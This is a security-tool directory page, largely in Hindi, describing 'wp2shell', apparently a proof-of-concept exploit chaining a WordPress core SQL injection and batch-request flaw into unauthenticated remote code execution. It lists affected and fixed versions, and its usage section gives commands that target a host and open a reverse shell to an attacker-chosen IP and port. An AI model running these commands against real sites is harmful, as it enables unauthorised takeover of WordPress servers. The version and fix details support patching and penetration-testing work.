Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-63030 — WP2Shell के नाम से ज्ञात WordPress कोर अनप्रमाणित RCE का PoC शोषण | Kitploit
उपकरण/GitHubGitHub/mverschu/cve-2026-63030
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubmverschu/cve-2026-63030

CVE-2026-63030

WP2Shell के नाम से ज्ञात WordPress कोर अनप्रमाणित RCE का PoC शोषण

रिपॉजिटरी देखें
41111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

wp2shell (CVE-2026-63030 / CVE-2026-60137)

नामwp2shell
सीवीईCVE-2026-63030 (batch desync), CVE-2026-60137 (author__not_in SQLi)
प्रभावितWordPress 6.9.0 to 6.9.4, 7.0.0 to 7.0.1
समाधान6.9.5, 7.0.2
प्रमाणीकरण आवश्यककोई नहीं
द्वारा खोजा गयाAdam Kues (Searchlight Cyber / Assetnote)

उपयोग

बेयर होस्ट = ऑटो स्कीम (https:// फिर http:// कोशिश करता है)। केवल तभी http:// या https:// उपसर्ग जोड़ें जब आप किसी एक को बाध्य करना चाहते हैं।

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
फ़्लैगयह क्या करता है
--shell [LHOST [LPORT]]सामान्य RCE श्रृंखला; डिफ़ॉल्ट LHOST इस मशीन का IP है, LPORT 443 है
--rest-routeपहले /?rest_route=/batch/v1 पर कोशिश करें
--verify-tlsTLS प्रमाणपत्र सत्यापित करें (प्रयोगशाला/स्व-हस्ताक्षरित के लिए डिफ़ॉल्ट रूप से बंद)
--proxy URLट्रैफ़िक को प्रॉक्सी के माध्यम से भेजें
--forceWordPress फिंगरप्रिंटिंग को छोड़ें
टूल डाउनलोड करें